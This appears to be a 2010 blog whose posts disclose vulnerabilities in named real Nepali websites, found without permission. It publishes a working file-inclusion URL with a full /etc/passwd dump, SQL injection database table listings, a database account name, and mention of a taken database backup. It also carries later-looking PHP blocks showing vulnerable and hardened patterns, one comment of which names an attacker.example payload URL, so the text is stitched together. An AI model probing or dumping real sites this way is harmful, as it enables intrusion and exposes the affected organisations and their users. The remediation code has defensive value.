Sunday 25 April 2010

LACM.EDU.NP [little angels college of management] File inclusion vulnerability

I was checking the site of Little Angels College of Management while they were here at KU for the sports week, and within a short while I found it to be vulnerable to file inclusion.
The vulnerable URL is:
http://lacm.edu.np/?lacm=[any_file_to_include]


/etc/passwd:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
shiva:x:500:500::/home/shiva:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
admispconfig:x:501:501:Administrator ISPConfig:/home/admispconfig:/bin/bash
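A dump like the one above is what an unrestricted include() of a client-supplied path produces. The block below is an added example, not code from lacm.edu.np (the site's source was never published): it shows the pattern that yields this behaviour beside a fixed version. It assumes the site is PHP, that the parameter is named lacm, and that page fragments live in a pages/ directory next to the script; the page names in the map are made up.

```php
<?php
// Added example: the vulnerable include() pattern and a hardened replacement.
// Assumptions: PHP, request parameter "lacm", page fragments under pages/
// next to this file. The page keys in PAGES are illustrative only.

// --- Vulnerable pattern ---
// ?lacm=../../../../etc/passwd includes the real /etc/passwd (the dump above).
// With allow_url_include=On, ?lacm=http://attacker.example/x.txt would be
// fetched and executed as well, turning a file read into code execution.
function render_page_vulnerable(array $get): void
{
    include $get['lacm'] ?? 'home.php';
}

// --- Hardened pattern ---
// The client never supplies a path, only a key; only keys present in this map
// are ever turned into a filename.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(?string $key): ?string
{
    if ($key === null || !array_key_exists($key, PAGES)) {
        return null;                      // unknown key: nothing on disk is touched
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath($base . '/' . PAGES[$key]);
    // Defence in depth: even if the map is edited badly later, refuse any file
    // that does not resolve to a location inside pages/.
    if ($base === false || $path === false
        || strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_page_hardened(array $get): void
{
    $path = resolve_page($get['lacm'] ?? 'home');
    if ($path === null) {
        http_response_code(404);
        echo 'No such page';
        return;
    }
    include $path;
}

render_page_hardened($_GET);
```

Two server-side settings back this up regardless of the application code: allow_url_include=Off (the default since PHP 5.2) keeps include() off the network, and open_basedir restricted to the site's own tree stops a traversal from reaching /etc even if a path does slip through. Neither replaces the allow-list; a readable /etc/passwd is only the most visible file, and config files with database credentials sit inside the web tree where open_basedir cannot help.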

And I also got the SQL DB. What the hell, they are keeping the database backup in the website root folder itself.
See you guys.

Ekantipur.com [Ekantipur - online news portal of Kantipur Daily] Vulnerability

Most of us know about Ekantipur.com, the online news portal of the Kantipur daily newspaper. They recently came out with a new design and development, and I was hoping to see a securely coded website, but I was still able to find some holes in it. There is a SQL injection vulnerability in the site of Kantipur Daily which can potentially be used to dump the DB; from there the admin panel can be compromised and possibly a shell obtained on the site.
I hope they will fix it soon, and if they want the details of the vulnerability, I would be happy to help them.
Database tables in the current DB:
» daily_updates
» ek_categories
» ek_gallary_comments
» ek_gallary_images
» ek_gallery_image_rating
» ek_news
» ek_news_comments
» ek_news_gallary
» ek_news_gallary_details
» ek_news_keywords
» ek_news_keywords_list
» ek_news_ratings
» ek_news_reporter_list
» ek_news_reporters
» ek_photo_features
» ek_photo_gallary
» ek_sub_categories
» ekn_categories
» ekn_gallary_comments
» ekn_gallary_images
» ekn_gallery_image_rating
» ekn_news
» ekn_news_comments
» ekn_news_gallary
» ekn_news_gallary_details
» ekn_news_keywords
» ekn_news_keywords_list
» ekn_news_ratings
» ekn_news_reporter_list
» ekn_news_reporters
» ekn_photo_features
» ekn_photo_gallary
» ekn_photo_gallary_details
» ekn_sub_categories
» exchange_rates
» horoscope
» horoscope_reading
» horroscope
» kan_categories
» kan_gallary_images
» kan_main_photo
» kan_news
» kan_news_author_list
» kan_news_comments
» kan_news_gallary
» kan_news_gallary_details
» kan_news_keywords
» kan_news_keywords_list
» kan_news_ratings
» kan_news_reporter_list
» kan_news_reporters
» kan_photo_features
» kan_photo_gallary
» kan_photo_gallary_details
» kan_sub_categories
» kq_categories
» kq_gallary_images
» kq_issue
» kq_main_photo
» kq_news
» kq_news_author_list
» kq_news_authors
» kq_news_comments
» kq_news_gallary
» kq_news_gallary_details
» kq_news_keywords
» kq_news_keywords_list
» kq_news_ratings
» kq_photo_features
» kq_photo_gallary
» kq_photo_gallary_details
» kq_sub_categories
» login_records
» models
» models_gallery_images
» nar_categories
» nar_gallary_images
» nar_issue
» nar_news
» nar_news_author_list
» nar_news_authors
» nar_news_comments
» nar_news_gallary
» nar_news_gallary_details
» nar_news_keywords
» nar_news_keywords_list
» nar_news_ratings
» nar_photo_features
» nar_photo_gallary
» nar_photo_gallary_details
» nar_sub_categories
» nep_categories
» nep_gallary_images
» nep_issue
» nep_news
» nep_news_author_list
» nep_news_authors
» nep_news_comments
» nep_news_gallary
» nep_news_gallary_details
» nep_news_keywords
» nep_news_keywords_list
» nep_news_ratings
» nep_photo_features
» nep_photo_gallary
» nep_sub_categories
» nepa_year
» nepse_chart
» news_agency
» news_keywords
» news_status
» news_types
» papers
» photo_gallary_details
» poll_option
» poll_ques
» privilege
» ratings
» sap_blow_up
» sap_categories
» sap_gallary_images
» sap_issue
» sap_news
» sap_news_author_list
» sap_news_authors
» sap_news_comments
» sap_news_gallary
» sap_news_gallary_details
» sap_news_keywords
» sap_news_keywords_list
» sap_news_ratings
» sap_photo_features
» sap_photo_gallary
» sap_photo_gallary_details
» sap_sub_categories
» stock_trading_companies
» tithi
» tkp_categories
» tkp_gallary_images
» tkp_main_photo
» tkp_news
» tkp_news_comments
» tkp_news_gallary
» tkp_news_gallary_details
» tkp_news_keywords
» tkp_news_keywords_list
» tkp_news_ratings
» tkp_news_reporter_list
» tkp_news_reporters
» tkp_photo_features
» tkp_photo_gallary
» tkp_photo_gallary_details
» tkp_sub_categories
» user_paper_privileges
» user_type_privileges
» user_types
» users
» video_categories
» videos
» weather_details
» weather_place
» wp_1_comments
» wp_1_links
» wp_1_options
» wp_1_postmeta
» wp_1_posts
» wp_1_term_relationships
» wp_1_term_taxonomy
» wp_1_terms
» wp_blog_versions
» wp_blogs
» wp_registration_log
» wp_signups
» wp_site
» wp_sitecategories
» wp_sitemeta
» wp_usermeta
» wp_users

No other dumps are posted here, for security reasons. I hope they will secure it.
Thank you.

NHNepal.com New Horizons Computer Learning Centers Vulnerability

NHNepal.com is the official site of New Horizons Computer Learning Centers in Nepal, and it is vulnerable to a minor injection attack. This vulnerability was reported to us by someone, and full credit goes to him/her for finding it.
They state:
With over 300 centers in 70 countries, New Horizons is the world’s largest independent IT training company. Over the past 25 years, New Horizons has delivered a full range of IT training and business skills training through innovative learning methods that have transformed businesses and helped over 25 million students reach their goals.

Anyway, a screenshot of the logged-in admin panel, from the hacker himself:

Thanks. I hope they secure it soon, or otherwise they will become the victim of another pwnage.

Monday 12 April 2010

Cybersansar vulnerability re-exposed

One of the most visited sites from Nepal, CyberSansar.com, is vulnerable to lots of serious injections like SQLi and XSS, but today I'm going to post only the SQL injection in the site. I hope they will try to fix the site after reading this post. No offense at all to them. Moreover, the MySQL version is greater than 5, so it is easier for an attacker to steal the database information.
User:database => cybernepal3@localhost:cybernepal_3
Tables:
album_detail
album_master
album_person_related
art_gallery
art_gallery_image
art_gallery_path
art_grp_tag_gal
art_tag_gallery
art_tag_photo
art_tags
article_person_related
author
bachelor_user_logon
bc_category_para
bc_final_person_profile
bc_person_profile
bc_photo_folder
bc_profile_list
bc_profile_para
contest_master
contest_question_detail
contest_question_master
cs_birthday_wish
discography
ethnicity_para
ev_gallery
ev_gallery_image
ev_gallery_path
ev_grp_tag_gal
ev_person_related
ev_tag_gallery
ev_tag_photo
ev_tags
event_master
event_para_person_related
event_type
gallery
gallery_image
gallery_path
group_list
grp_tag_gal
job
org_para
org_type
person_persontype
person_taghion
photographer
popular_models
pr_category_para
pr_gallery_image
pr_hion
pr_person_detail
pr_person_profile
pr_persontype
pr_persontype_para
pr_photos
pr_profile_list
pr_profile_para
pr_question_related
pr_subcategory_para
pr_users
profile
profile1
profile_persontype
register_users
section
song_genre_related
song_orginal_singer_related
song_person_related
srw_login
srw_news
tag
tag_article
tag_gallery
tag_list
tag_photo
tags
user_logon
users
users_artist
vdb_music_category
vdb_video_info
vdb_video_info_backup
video_feature_singer_related
video_genre_related
video_orginal_singer_related
video_person_related
wallpaper
wallpaper_gallery 
I'm too lazy to dump each column's data, lol. Anyway, it's just a message to CS about how insecure they are.
Hope they fix this soon.
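Both this post and the Ekantipur one above describe the same class of bug: a numeric parameter concatenated into SQL text. The block below is an added example, not code from cybersansar.com or ekantipur.com (neither site's source was published). It shows that pattern, why the "MySQL greater than 5" remark matters, and the prepared-statement replacement. It assumes PHP with PDO, a page that reads ?id=, and columns album_id, title and description on the album_master table; the table name appears in the dump above, the column names are made up.

```php
<?php
// Added example: string-built SQL beside a parameterised query.
// Assumptions: PHP with PDO against MySQL, request parameter "id",
// and columns album_id/title/description on album_master (columns assumed).

// --- Vulnerable pattern ---
function get_album_vulnerable(PDO $db, string $id): ?array
{
    // $id becomes part of the SQL text, so the client controls the query.
    $sql = "SELECT title, description FROM album_master WHERE album_id = $id";
    $res = $db->query($sql);
    $row = $res ? $res->fetch(PDO::FETCH_ASSOC) : false;
    return $row === false ? null : $row;
}
// Why the MySQL version matters: since 5.0 the server exposes
// information_schema, so a UNION appended through $id can select
//     table_name FROM information_schema.tables WHERE table_schema = DATABASE()
// and list every table the connected user can see in one request (that is
// how a complete listing like the one above is produced). On 4.x the
// attacker has to guess table names one by one.

// --- Hardened pattern ---
function connect(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        // Real server-side prepares. With emulation left on, PDO only quotes
        // on the client, which is weaker and charset-sensitive.
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}

function get_album(PDO $db, string $id): ?array
{
    if (!ctype_digit($id)) {          // an id is a non-negative integer, nothing else
        return null;
    }
    $stmt = $db->prepare(
        'SELECT title, description FROM album_master WHERE album_id = :id'
    );
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();                 // the value travels separately from the SQL text
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

The ctype_digit check is a type check, not the defence; the binding is. Two things in the dump above are worth acting on independently of the query fix: the web application connects as cybernepal3, so that account should hold only SELECT/INSERT/UPDATE on its own tables and never FILE, and display_errors should be off in production, since error-based extraction depends on MySQL's messages reaching the page.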